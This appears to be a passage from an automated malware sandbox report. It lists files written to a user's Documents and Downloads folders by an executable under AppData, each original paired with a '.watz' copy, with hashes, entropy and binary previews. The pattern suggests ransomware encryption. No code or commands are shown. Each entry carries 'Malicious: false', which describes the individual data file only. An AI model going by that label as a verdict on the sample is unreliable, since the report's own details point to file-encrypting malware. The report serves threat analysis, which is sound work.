SSDEEP:	24:+trSRkegiudGtXqEwP49U6d3NR/sNUWfyBWYamo05/TdkPOv15FBammMbqOZbD:+tSRkehuPEwwPncUWMWYamowT/DaseOR
MD5:	97AF955B166097E0308C75FC3919C698
SHA1:	D4B135D89D9FAEA9315A4CD5338A85EBF61C66D3
SHA-256:	571062355A90AD8EBAC830E53D4CF747D3063F9BF94BA46F82F8673AD1C00A79
SHA-512:	E9102441B166D6DC28BD65420D795B1E8AF3B00B0B9F7EAEB763FCC02C597E0C1E1748E4AF5C1A018777BD69D79DE1BE2645AF4BD7316C98D4512EF2B56EF958
Malicious:	false
Preview:	KATAX.<w.hG..........+c.h.MHG..a..v../...\|wdvX0.i.],..E_.._......m..r~?Q..-a.E.0.9x..s.n.x7...:.H .n8.8....7.Zz-.cb.Wq......t...I..R..G..~c.]z.\|.....R...Ol..(..`G.i.....f.c..\|.`.f=3~ ..^.......<a.....y.....'..`.....y.......4.`lRF:B.T._h.v%\U2f..9.....5.a7;y~.3..A\|...V2.....c.'~m...9...f.....2^.!%.2....g..!..n^..M...B..".O...;...e.-.S..>0..HGc...#]X.F.c..'.:!i.FA.[D.g..d,.-Z..[.B...GM...w<.x.....%_.....B,......-...a../.t..w.R...Y...m8t0..z..t....^.........V.....X-..Q.1.S3..=t..M..66.fT-WJ...Py..5R.#y0..>3..%.8...&1H..3.. .d/r.9y.K..0%.\.&1.}...9...0...ob....k..,.j......:_%`7.g....mKo.XA...2...>.z@.^.....'.(....D...H...Q..{f.D.........0V.gh.l&l..lR........d....P.....@.g.OI,....H........#.....}.[.....kZ..6F.o..M..nS~.H(c.)\....Bz..t.,.[.\|......$9........5....4...0.*.~..m$..%.?Ra.......Z.[X....+..=t...?...v.oh)..i...v.'j.<J...."..[&.. \=..6....m..........i..B...x.,g...XM.YY.jX.C.>.t)..KU..;............)....M...%...~$.:....T.:.M.

C:\Users\user\Documents\VLZDGUKUTZ\NWTVCDUMOB.jpg

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855748188381476
Encrypted:	false
SSDEEP:	24:d6HS4rpubccE6zhIuF21Y4Buh5Q793NqtKx4FjJvTRq02JRakObD:dIS4wccEohIug1tuh2CtKxsvlqzHatD
MD5:	BD9174CB055EABE2AEB3630B4429788E
SHA1:	9667A8973AE9685364F547BD98504356E4B55DB2
SHA-256:	3582CF78288937022575C1056D17E4E8E690294144B193FB3BEA04F35B76D778
SHA-512:	F3110DC6EFF377EE74751935726F349D0A3B63D73000C14BECF9B8CECE0C9B3A1ABD0582FC3FE7BB972CEF1A5AAD34C86B637A59FC1FA7ED4CA1BB3D2BED490E
Malicious:	false
Preview:	NWTVCq.....lh......=..1...l.6!\c.....7.+....#tY..y..4..Z..Z.....X......,.C...!.c....6y%Lz.@..H=.....]..F...>?HpD)..\..+...e.....vd..of..k..%...-.I...0}......ga6s.&.g.h/o.Y8.W.6!{.2...B..=...k...`[F...!.Km.....]q$...&/.Y.=.B/X...C4..S..d..1.p....s..M..'....%.....M.....+....KiD.4........X..HT.&.b;#`.e...%[^...x=4E.g....7.F....(,T....B.c~...w.;....t.+?:."x..C...=O.S5h....f.t..s.;.Hq26.}..;./...........7.T....%.q.8.Q.4..a.....o..Y..u#...B6..M=..L..6_.....l..ye..`e.b{.s4.u{....t$..J ..yE...ZB.S';.F.0.S.4..h.......).........>..A&L..w..0g.i..a.<.gR..N.{.P.cF...........%.}.ll1.f.{<W.L..ON..y...s/.i.b.J.....e..iS'2nx.If...YE.w.iQ.T.0..%..mk....8..F/....-.....#&.....9Y>..[...dZ.).g.f1A..0.....e...yu...u.;u..Q\...t.u..t.z.Om...r\|ch...S...mi.i...6...}.5@3s..[.......5...'&.Uz....v....&;..uX..B....P.3.K.u.".._...B).j...G1cqi..%..1^.\.T....;e..}N.,M^[.v.....w.}..5I.i...{..M..A.e.?\.`.....Uz.Ng.....;.\|$..OD\|B...k..D.))...pM\<.....n.H....J.v.....k?`/..m'...p...

C:\Users\user\Documents\VLZDGUKUTZ\NWTVCDUMOB.jpg.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855748188381476
Encrypted:	false
SSDEEP:	24:d6HS4rpubccE6zhIuF21Y4Buh5Q793NqtKx4FjJvTRq02JRakObD:dIS4wccEohIug1tuh2CtKxsvlqzHatD
MD5:	BD9174CB055EABE2AEB3630B4429788E
SHA1:	9667A8973AE9685364F547BD98504356E4B55DB2
SHA-256:	3582CF78288937022575C1056D17E4E8E690294144B193FB3BEA04F35B76D778
SHA-512:	F3110DC6EFF377EE74751935726F349D0A3B63D73000C14BECF9B8CECE0C9B3A1ABD0582FC3FE7BB972CEF1A5AAD34C86B637A59FC1FA7ED4CA1BB3D2BED490E
Malicious:	false
Preview:	NWTVCq.....lh......=..1...l.6!\c.....7.+....#tY..y..4..Z..Z.....X......,.C...!.c....6y%Lz.@..H=.....]..F...>?HpD)..\..+...e.....vd..of..k..%...-.I...0}......ga6s.&.g.h/o.Y8.W.6!{.2...B..=...k...`[F...!.Km.....]q$...&/.Y.=.B/X...C4..S..d..1.p....s..M..'....%.....M.....+....KiD.4........X..HT.&.b;#`.e...%[^...x=4E.g....7.F....(,T....B.c~...w.;....t.+?:."x..C...=O.S5h....f.t..s.;.Hq26.}..;./...........7.T....%.q.8.Q.4..a.....o..Y..u#...B6..M=..L..6_.....l..ye..`e.b{.s4.u{....t$..J ..yE...ZB.S';.F.0.S.4..h.......).........>..A&L..w..0g.i..a.<.gR..N.{.P.cF...........%.}.ll1.f.{<W.L..ON..y...s/.i.b.J.....e..iS'2nx.If...YE.w.iQ.T.0..%..mk....8..F/....-.....#&.....9Y>..[...dZ.).g.f1A..0.....e...yu...u.;u..Q\...t.u..t.z.Om...r\|ch...S...mi.i...6...}.5@3s..[.......5...'&.Uz....v....&;..uX..B....P.3.K.u.".._...B).j...G1cqi..%..1^.\.T....;e..}N.,M^[.v.....w.}..5I.i...{..M..A.e.?\.`.....Uz.Ng.....;.\|$..OD\|B...k..D.))...pM\<.....n.H....J.v.....k?`/..m'...p...

C:\Users\user\Documents\VLZDGUKUTZ\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856917469694434
Encrypted:	false
SSDEEP:	24:4891CFEYSkjF2XnKbj4/5WrDtGV4rWmIFTG4I1qvhUZjf7tK+Sbn8WJr3HHGDf4U:zaFEYSkjrjQ54tmWo3UZb75Sbn8EXqfd
MD5:	A81240A8AA0F771E24B3D604E293A4F7
SHA1:	E0290B9919432C880459691E45A010F57BA9A8FA
SHA-256:	38A83594936F5AE69883DB3B9ADB6005DC956620645910A7A93C97C25FD72259
SHA-512:	8FF54ADDABED8CAF115EE63C77C7DAF10B47215DFEBB90430A41063A9B857B484AF0CFD31E5E7BC876FE0575B21A65ED4D2A220E9B19147277E1BB1B7F2FC6AB
Malicious:	false
Preview:	VLZDG4.Z....z.x.......j.n`...'K..E..$........+.}.Ev...z.Rcx...p.z?.......Ec.S..#...T.. a..5.........G'+....u..P.)...#.R.g.r..o..M}.....v...et..YMS..,.OE...=...)c..'..s.(k.Gj.l...C3....X....s.XT..LxD.]0..-U......J5.........,.m..C.mP..x=..mg.j..m...h`..2..$.L....Df.E.B..P..iHa..D.L...%.......FD..^'.}K.O...p.uG..Q0..+...;.{..,)<.Z..(..a=6o.....B...qA....:N.2.u.X..n.C..H...!....^{j.....Q.DsIU....?.'+V.oL.t....`...'....A.1h88.B.....C.... ...p.n4."...R...3Oh..H....C(</'.S..Ta[{P.).r........t...>9.... ..8.D..k..Jf.4.?...>.....\wG....Jy.>..n..f.K.mx.Y...b..D. ......(4...ZfY.......:....j,..g..]......&xH].p%.o7..p...@..A..I......Z...A.M...3K.-::j9.....;-.(..UG..c..b'.^....G......1..{...A...??...y...b.=.>.>....t..o}..M.+F.FP.'..K........$.ds.'n.\|..W<x..B.......!........6.[;v<.j.z.l....][..VAT...b@.\....s.'9+."..W.;..^.>T.......W...OHj.+.....S.r.4k"..e..cW.S.X.Y.3qb....J.........~......^..E....9.m..8.q.j.....I..5=..H&.>.k.gJ.../.Nd4...\h}..k0..,J

C:\Users\user\Documents\VLZDGUKUTZ\VLZDGUKUTZ.docx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856917469694434
Encrypted:	false
SSDEEP:	24:4891CFEYSkjF2XnKbj4/5WrDtGV4rWmIFTG4I1qvhUZjf7tK+Sbn8WJr3HHGDf4U:zaFEYSkjrjQ54tmWo3UZb75Sbn8EXqfd
MD5:	A81240A8AA0F771E24B3D604E293A4F7
SHA1:	E0290B9919432C880459691E45A010F57BA9A8FA
SHA-256:	38A83594936F5AE69883DB3B9ADB6005DC956620645910A7A93C97C25FD72259
SHA-512:	8FF54ADDABED8CAF115EE63C77C7DAF10B47215DFEBB90430A41063A9B857B484AF0CFD31E5E7BC876FE0575B21A65ED4D2A220E9B19147277E1BB1B7F2FC6AB
Malicious:	false
Preview:	VLZDG4.Z....z.x.......j.n`...'K..E..$........+.}.Ev...z.Rcx...p.z?.......Ec.S..#...T.. a..5.........G'+....u..P.)...#.R.g.r..o..M}.....v...et..YMS..,.OE...=...)c..'..s.(k.Gj.l...C3....X....s.XT..LxD.]0..-U......J5.........,.m..C.mP..x=..mg.j..m...h`..2..$.L....Df.E.B..P..iHa..D.L...%.......FD..^'.}K.O...p.uG..Q0..+...;.{..,)<.Z..(..a=6o.....B...qA....:N.2.u.X..n.C..H...!....^{j.....Q.DsIU....?.'+V.oL.t....`...'....A.1h88.B.....C.... ...p.n4."...R...3Oh..H....C(</'.S..Ta[{P.).r........t...>9.... ..8.D..k..Jf.4.?...>.....\wG....Jy.>..n..f.K.mx.Y...b..D. ......(4...ZfY.......:....j,..g..]......&xH].p%.o7..p...@..A..I......Z...A.M...3K.-::j9.....;-.(..UG..c..b'.^....G......1..{...A...??...y...b.=.>.>....t..o}..M.+F.FP.'..K........$.ds.'n.\|..W<x..B.......!........6.[;v<.j.z.l....][..VAT...b@.\....s.'9+."..W.;..^.>T.......W...OHj.+.....S.r.4k"..e..cW.S.X.Y.3qb....J.........~......^..E....9.m..8.q.j.....I..5=..H&.>.k.gJ.../.Nd4...\h}..k0..,J

C:\Users\user\Documents\VLZDGUKUTZ\YPSIACHYXW.png

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8646575523652364
Encrypted:	false
SSDEEP:	24:EFOBHwGKM+KLBHmxlhKHD6cWmYuI0kBTOqE0tZMlntmL3L7CsbD:ltBpmt2DHWm9ITBTOqDilnO3LXD
MD5:	2E0A98CF3DF9A0A93A3D51F468365A98
SHA1:	DBE6EDDEAD3B5901FD66402F7373DA6AF9B6DDD8
SHA-256:	301D122A1C17D1FB6189DD69D037FAF4C1179960B7EEE0869F361F4A3845E6AB
SHA-512:	889D0DD17B2AB9B083EAD2ACF696162715F3613BA2ECDA3929E9841CAF98C0D4A02A2FA8D2D8D08384284E7713CE8893C701D3303F7A6C9887A10B23F838BA5B
Malicious:	false
Preview:	YPSIA..Z..p.e...p..._.e$.n....9.........\....'.E...uY.ju.^.H;`.._h.....Z.>&%..-.4...C8.y6..K&.(.IG...h.=.....l...1.....S)...g.G.....,n..>A...'..V....ob,6...o..Q-.r.\|......./..+2..Qr.{K.....K..J..j1$V.b..).rS..q..V.@..o.p7Ui.M.....y...-.L.......J ....6..z..>..<L..p#}{....../.J......K$@h....r...S[A'.i....p......}.....d..!5b..e)[.>F_.. ..K...S.[iB.}..Ll1l[..k."........n...!..\|a;....... V....?5B.,U].=.]M.....lw.H53....L.9l:?..C...r<......=.?.F....Kd..H..q.mY$/.....r.........s.....B..b....p..je.&}R.C@...,..y..>.....=sa.P-u..r.zv.6..>...z..D.+U?/.....c1.....a..2H..hv....%.%..8....w.%.u.M`..,a.@<J......d...M.k...!sL.b$.W{...t.+op.D.....NN_z'..<...%.7..D..:4>^Dy)o.. .j.8P..#>U6..FT.uc.jX.........).p9T.wlY.lo,..n..r.(9i...l...t#..].G........b...Y.3O.h..g.._.)..K.+:.....D..O..f(....Z..P..I.}j.;.KS........R..KW...0.X.....:\|...P...+.cB.....S..d5...`...mXe.A..+.)..C\.....1.......}2wI.,u.).. ...3..,-M j.\....jZ..h..@.t.Q5..<.]r...g..L...J.....(.

C:\Users\user\Documents\VLZDGUKUTZ\YPSIACHYXW.png.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8646575523652364
Encrypted:	false
SSDEEP:	24:EFOBHwGKM+KLBHmxlhKHD6cWmYuI0kBTOqE0tZMlntmL3L7CsbD:ltBpmt2DHWm9ITBTOqDilnO3LXD
MD5:	2E0A98CF3DF9A0A93A3D51F468365A98
SHA1:	DBE6EDDEAD3B5901FD66402F7373DA6AF9B6DDD8
SHA-256:	301D122A1C17D1FB6189DD69D037FAF4C1179960B7EEE0869F361F4A3845E6AB
SHA-512:	889D0DD17B2AB9B083EAD2ACF696162715F3613BA2ECDA3929E9841CAF98C0D4A02A2FA8D2D8D08384284E7713CE8893C701D3303F7A6C9887A10B23F838BA5B
Malicious:	false
Preview:	YPSIA..Z..p.e...p..._.e$.n....9.........\....'.E...uY.ju.^.H;`.._h.....Z.>&%..-.4...C8.y6..K&.(.IG...h.=.....l...1.....S)...g.G.....,n..>A...'..V....ob,6...o..Q-.r.\|......./..+2..Qr.{K.....K..J..j1$V.b..).rS..q..V.@..o.p7Ui.M.....y...-.L.......J ....6..z..>..<L..p#}{....../.J......K$@h....r...S[A'.i....p......}.....d..!5b..e)[.>F_.. ..K...S.[iB.}..Ll1l[..k."........n...!..\|a;....... V....?5B.,U].=.]M.....lw.H53....L.9l:?..C...r<......=.?.F....Kd..H..q.mY$/.....r.........s.....B..b....p..je.&}R.C@...,..y..>.....=sa.P-u..r.zv.6..>...z..D.+U?/.....c1.....a..2H..hv....%.%..8....w.%.u.M`..,a.@<J......d...M.k...!sL.b$.W{...t.+op.D.....NN_z'..<...%.7..D..:4>^Dy)o.. .j.8P..#>U6..FT.uc.jX.........).p9T.wlY.lo,..n..r.(9i...l...t#..].G........b...Y.3O.h..g.._.)..K.+:.....D..O..f(....Z..P..I.}j.;.KS........R..KW...0.X.....:\|...P...+.cB.....S..d5...`...mXe.A..+.)..C\.....1.......}2wI.,u.).. ...3..,-M j.\....jZ..h..@.t.Q5..<.]r...g..L...J.....(.

C:\Users\user\Documents\WUTJSCBCFX.pdf

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848579017017912
Encrypted:	false
SSDEEP:	24:9DQuQDOOpXEbZJkE+xA3wWvRuiw/ooemcXUiLSvcbsRW17ybD:POOOp0ZJkE+YwCMiaJKUqccGW1sD
MD5:	833BCE91C942DF8798C0121052203BFD
SHA1:	1A00A823270D9049A64FBAEADE683453B924E205
SHA-256:	7CB3A98EF3731745E4B8F5E5C00D5DD02BE35838C3B0E8B898C780EAB77B1578
SHA-512:	A7E67464AFD5EF54EF697577B1D3564BB7CD26EE1F297085B2722946D009175CFCBCF04A60127503A37BA45904A86E17A83F3B5E99BC51B726CFAC414956BD90
Malicious:	false
Preview:	WUTJS..+...1.......,Uv...a..E..\..Gh....b..z.fnTd.....'..(..W..'.=q.%...-`..Y.."....U9D.....Z.dhU..>`...5 Mr.....=..9.qC.....0.O..gY..9.....{..0...4....Yg.....~..........<...9iXO.qv.......d=........TY.......z!..."...H.w...o{:.N.2..t<.Qi...wLZGc..GRK.?Wf....e...~6....{....+!..............A.!...........`.....U........d.j.n......%1}.A...:..C....>R....}.Sk.s.&...../+Y]....@h.^..S..;.MT.&ym.~...Q....6.'..}.7.I/(....>...C..^.....k.s.x.4.]7.(.N....."/..^.I.d%.m..=......P...ruDd.j....~..o...dE=.".w.}h.....h..5p.&....x..K.`...>.J..9.-.o.@$.H...%.V...n.9.........%..q-.A_1qr...x.....+.....D..G.........A......h.c.a........../...v..C......^@.N.S.....$7Q....g.;...p.{....v"FK.`.B....+.rQ..Ba/.e..F....S1..H....vm..d.N..F..!{....q{.H..F..E>k..>.-....q`b.....U..... C..x_..#...INe.p-..1.`.-.....7F.i.]..W..;.^.A....'.........~M..8&..-.I.......\A04l..1.S.>s\&...z.B.X..(...C.o.Hm.......f?.^...,3.S....!....VIO..a.q...X.r.....>..u.zx."{.Lh.P...dM..

C:\Users\user\Documents\WUTJSCBCFX.pdf.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848579017017912
Encrypted:	false
SSDEEP:	24:9DQuQDOOpXEbZJkE+xA3wWvRuiw/ooemcXUiLSvcbsRW17ybD:POOOp0ZJkE+YwCMiaJKUqccGW1sD
MD5:	833BCE91C942DF8798C0121052203BFD
SHA1:	1A00A823270D9049A64FBAEADE683453B924E205
SHA-256:	7CB3A98EF3731745E4B8F5E5C00D5DD02BE35838C3B0E8B898C780EAB77B1578
SHA-512:	A7E67464AFD5EF54EF697577B1D3564BB7CD26EE1F297085B2722946D009175CFCBCF04A60127503A37BA45904A86E17A83F3B5E99BC51B726CFAC414956BD90
Malicious:	false
Preview:	WUTJS..+...1.......,Uv...a..E..\..Gh....b..z.fnTd.....'..(..W..'.=q.%...-`..Y.."....U9D.....Z.dhU..>`...5 Mr.....=..9.qC.....0.O..gY..9.....{..0...4....Yg.....~..........<...9iXO.qv.......d=........TY.......z!..."...H.w...o{:.N.2..t<.Qi...wLZGc..GRK.?Wf....e...~6....{....+!..............A.!...........`.....U........d.j.n......%1}.A...:..C....>R....}.Sk.s.&...../+Y]....@h.^..S..;.MT.&ym.~...Q....6.'..}.7.I/(....>...C..^.....k.s.x.4.]7.(.N....."/..^.I.d%.m..=......P...ruDd.j....~..o...dE=.".w.}h.....h..5p.&....x..K.`...>.J..9.-.o.@$.H...%.V...n.9.........%..q-.A_1qr...x.....+.....D..G.........A......h.c.a........../...v..C......^@.N.S.....$7Q....g.;...p.{....v"FK.`.B....+.rQ..Ba/.e..F....S1..H....vm..d.N..F..!{....q{.H..F..E>k..>.-....q`b.....U..... C..x_..#...INe.p-..1.`.-.....7F.i.]..W..;.^.A....'.........~M..8&..-.I.......\A04l..1.S.>s\&...z.B.X..(...C.o.Hm.......f?.^...,3.S....!....VIO..a.q...X.r.....>..u.zx."{.Lh.P...dM..

C:\Users\user\Documents\YPSIACHYXW.png

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836569369422998
Encrypted:	false
SSDEEP:	24:EHhQr4PwIhV9mSo5992oEkhJngdQCp8Tx04IVKz4CkYD3sAfobD:ey4XhV7GXhJngdx2TxpIkz1D8qyD
MD5:	80D52E2080920E455BCFFEE35D416F27
SHA1:	1EF5D8689B1E1922545B7AA3E6533DD7E4737EFB
SHA-256:	2D0A91B39838EBD63ACE3D0458DF428B2E7BA075FFCBF7722E7E5D50C7E9E970
SHA-512:	6CA7989883B507ED4185508E4D8D5FC613C8198CB1A505D4F2618F1EB3A2B2D41804FB807B1774D31DD4AA9B01BB83509803405ABF70FCC7F178B97602217E02
Malicious:	false
Preview:	YPSIAJ.Euld.I.g.z...&1..R....!.....X.o.....o...-.A.G...+J.........K.. ....p3g....5.3....!..D(.b...@T.).n.ocP.\|..I..[...v.O..qNWd.D.w-....Q..1....5.3........i..\.....M....@l...<wJ...N}A#...n.....RJ..Pc.fv.G=..5:..N).M.P....}....q..v3..&.L}].f4VU(.k.7S...-...._lQ..V.j..Z^.h.X...a..&.U.:....{e........?..MJ..(...Z...]....E.b&.;...`i..k.\|....[..=..{...........v..5..]l...u...O..6.q......./.i.:.:....a...q.7p...."Y.G..U@8...#."..4?6-...?},.).lO...X.hV....2...kp]+{...K.f........Am....a.u.P.n.].1....h....V.,..)7..U..'2.v.Z.3.,.9....Gm.`."..n.R....0.......s...?..-...ME5.e.@..H.k....5...5.%.x......@.#B.wJT....E.F..n...USB.Irn..H.........2..Pz..j.Y=)S.W...8h..op.X..].V.A..2...jcP_,.T..e]..(....Y..(=b......._.g2...mc....VtD,`.II...._...@g....W...e........k..6..@...J8...!...... ..V.Y.....b..6..O....U...-J..kK..R...F}.D.......]....7rq...0.=p...v<...+.....zP.....q...CZ.AC#..5c..%.q...4.....5R..?.#(..m..xKi.v..UC.i.5./.....P....:a..a...M.ZIk..

C:\Users\user\Documents\YPSIACHYXW.png.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836569369422998
Encrypted:	false
SSDEEP:	24:EHhQr4PwIhV9mSo5992oEkhJngdQCp8Tx04IVKz4CkYD3sAfobD:ey4XhV7GXhJngdx2TxpIkz1D8qyD
MD5:	80D52E2080920E455BCFFEE35D416F27
SHA1:	1EF5D8689B1E1922545B7AA3E6533DD7E4737EFB
SHA-256:	2D0A91B39838EBD63ACE3D0458DF428B2E7BA075FFCBF7722E7E5D50C7E9E970
SHA-512:	6CA7989883B507ED4185508E4D8D5FC613C8198CB1A505D4F2618F1EB3A2B2D41804FB807B1774D31DD4AA9B01BB83509803405ABF70FCC7F178B97602217E02
Malicious:	false
Preview:	YPSIAJ.Euld.I.g.z...&1..R....!.....X.o.....o...-.A.G...+J.........K.. ....p3g....5.3....!..D(.b...@T.).n.ocP.\|..I..[...v.O..qNWd.D.w-....Q..1....5.3........i..\.....M....@l...<wJ...N}A#...n.....RJ..Pc.fv.G=..5:..N).M.P....}....q..v3..&.L}].f4VU(.k.7S...-...._lQ..V.j..Z^.h.X...a..&.U.:....{e........?..MJ..(...Z...]....E.b&.;...`i..k.\|....[..=..{...........v..5..]l...u...O..6.q......./.i.:.:....a...q.7p...."Y.G..U@8...#."..4?6-...?},.).lO...X.hV....2...kp]+{...K.f........Am....a.u.P.n.].1....h....V.,..)7..U..'2.v.Z.3.,.9....Gm.`."..n.R....0.......s...?..-...ME5.e.@..H.k....5...5.%.x......@.#B.wJT....E.F..n...USB.Irn..H.........2..Pz..j.Y=)S.W...8h..op.X..].V.A..2...jcP_,.T..e]..(....Y..(=b......._.g2...mc....VtD,`.II...._...@g....W...e........k..6..@...J8...!...... ..V.Y.....b..6..O....U...-J..kK..R...F}.D.......]....7rq...0.=p...v<...+.....zP.....q...CZ.AC#..5c..%.q...4.....5R..?.#(..m..xKi.v..UC.i.5./.....P....:a..a...M.ZIk..

C:\Users\user\Downloads\BPMLNOBVSB.png

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852693079236578
Encrypted:	false
SSDEEP:	24:p6Y4eylWCOnknlYdZ5nrGPlQLWlgz5Ac9yePWRG3ZhylAHxOTmGCWFg3DFzhpGNO:pvygTklGG9QLIQ5xyE3ZElAnRsgT9rGM
MD5:	5179EDD42CB5B13177D0C999D7FFC1DB
SHA1:	259F12A9B49689A8271BAA94CE4D76591D26902D
SHA-256:	AE7A4D88C048D1D26D88A40FADF79B89EC8FC7C0CBED420FEFB854E6DAFB6771
SHA-512:	C36F2826ED097FF87AF3DA5B54E78600EF26983ACB3770E5841A8226637B8096B29A1ADB08539793C687E4AD6F966285EBFE76916E5EA014B5D6FBA6F6B960AD
Malicious:	false
Preview:	BPMLN..}.....9....j..6.......,.rE`...O....d.Z.....=7,.%4...'......X..;?.X........c....o.7 t<.\|.sw..o.C\.C.X...'T.d-A{/.S:\|...ph....1...X8..k...F....~..W...s..A!.=.U{..{q....[-+...O...q@...H ....\|To#.\.M...j..i-f..eHtv...[..T..t..2..`....En>....0...P..HW.$..y.y.l.h.wF..`or.o.m.%A.L.<.s;..x....:~2T...^.q,vW.IX&._...10pV-lo..W#...O....".~.b..DgM.z..7....p.l...~7.R.U..@.8.....]......EO.C...O.4.e......:&.e{Y.....8......W.d.....!.bk.....nT.U.9...?..?u..........\|.)...:xH.kK..D........{...$5WV....5.5J......}.......&.=.'.$.n@..5.....D.?U..zA...Z]jn..?..w.....4y..~.s_..D...1....b-..fnJ..Ez.Ev.....=mf..t..6.QZ.<".B...O.\|?..y.%!..k^.-...a..'&qQ.g.....b.r%..O......q.."....4..)&....MDo.....5...v..n..T..cG0(....G.Y..c.)x.(.K...f....x.x.....+....C..u..t...pO.....'.'.....;...>.(O.,v....\&.....>...}i...[....<\|.}g`...kC..`...~..d~8UA..3n...Q.....A3=..P.3V(7.+.'.b.%+......`.6$.;I3.D..2..3sv.......M.J.!.....Y.5 .X.5..FO..... .<=T.E.\..D...osIUm$.6PI.

C:\Users\user\Downloads\BPMLNOBVSB.png.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852693079236578
Encrypted:	false
SSDEEP:	24:p6Y4eylWCOnknlYdZ5nrGPlQLWlgz5Ac9yePWRG3ZhylAHxOTmGCWFg3DFzhpGNO:pvygTklGG9QLIQ5xyE3ZElAnRsgT9rGM
MD5:	5179EDD42CB5B13177D0C999D7FFC1DB
SHA1:	259F12A9B49689A8271BAA94CE4D76591D26902D
SHA-256:	AE7A4D88C048D1D26D88A40FADF79B89EC8FC7C0CBED420FEFB854E6DAFB6771
SHA-512:	C36F2826ED097FF87AF3DA5B54E78600EF26983ACB3770E5841A8226637B8096B29A1ADB08539793C687E4AD6F966285EBFE76916E5EA014B5D6FBA6F6B960AD
Malicious:	false
Preview:	BPMLN..}.....9....j..6.......,.rE`...O....d.Z.....=7,.%4...'......X..;?.X........c....o.7 t<.\|.sw..o.C\.C.X...'T.d-A{/.S:\|...ph....1...X8..k...F....~..W...s..A!.=.U{..{q....[-+...O...q@...H ....\|To#.\.M...j..i-f..eHtv...[..T..t..2..`....En>....0...P..HW.$..y.y.l.h.wF..`or.o.m.%A.L.<.s;..x....:~2T...^.q,vW.IX&._...10pV-lo..W#...O....".~.b..DgM.z..7....p.l...~7.R.U..@.8.....]......EO.C...O.4.e......:&.e{Y.....8......W.d.....!.bk.....nT.U.9...?..?u..........\|.)...:xH.kK..D........{...$5WV....5.5J......}.......&.=.'.$.n@..5.....D.?U..zA...Z]jn..?..w.....4y..~.s_..D...1....b-..fnJ..Ez.Ev.....=mf..t..6.QZ.<".B...O.\|?..y.%!..k^.-...a..'&qQ.g.....b.r%..O......q.."....4..)&....MDo.....5...v..n..T..cG0(....G.Y..c.)x.(.K...f....x.x.....+....C..u..t...pO.....'.'.....;...>.(O.,v....\&.....>...}i...[....<\|.}g`...kC..`...~..d~8UA..3n...Q.....A3=..P.3V(7.+.'.b.%+......`.6$.;I3.D..2..3sv.......M.J.!.....Y.5 .X.5..FO..... .<=T.E.\..D...osIUm$.6PI.

C:\Users\user\Downloads\CURQNKVOIX.mp3

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8447982189098395
Encrypted:	false
SSDEEP:	24:HHfAjyKhk42bwVas/5R+ntH3QvJu0jfvSKaQgi9KrrKR5gqZppac9v7CMtkjbD:nYjD/2bwVj+ntH32JNyFi90r2g8acvO5
MD5:	392D565677C27B53F048E7C5AF194EDD
SHA1:	E28C9A900E73D407E0FE4E6817383E4C46E33882
SHA-256:	744B9F088CB93EC2968B8B1A995A4DE5CC29E74B0F2AD082A816AA3D27615A3F
SHA-512:	D0BED90E8A1CE7B7F4BE03BB55DA737F4E8BEEA59AEA96DEED01240AA5807AAE983431027573BE7C6BD2E47D2BD9A3E7E234F11E4FE32071E448755D878DE7EB
Malicious:	false
Preview:	CURQN'.ev.^.Y-N........ftJ>.3.k85a..J{..P..T.....n...l..#)5..8.!...._y..~X.6-Ux.........k.U...uZY6-.^}...I ......._p.B.?.........(~..j..ar.y..j.s......Y...TpU-...8.rqR......PFl,...f.......$d=...N...J=.e....2.E...9.Z..7)...}w+.v..uX ..O.<?.@.._..J..&[...>.......L-&.'.E..;.....WS&T.?)o.......zV5...8.. ...IKi#U......f)P..... [,....._.b.(6v.{.G.\|.V..,..pw....f....C7.m.8.56y.Gs...;....1.h...1..N.P..J...@S]>...hrj.O...P.....y.>`Umx.]...N"P.AQ.Vi..Y...t-_.a......)...t.PL.L 4......@[xw...w.W.....0...Esf....L...L.cG......`hm.......I..+.7.j.H..F<........W......P.+.n.x..;A..m...qQ@.@..IA...Eu.6.\...D>.S#.....(K.......t.+....s/.%..K..."..:.I.9._....Q...~...m;.a.S... 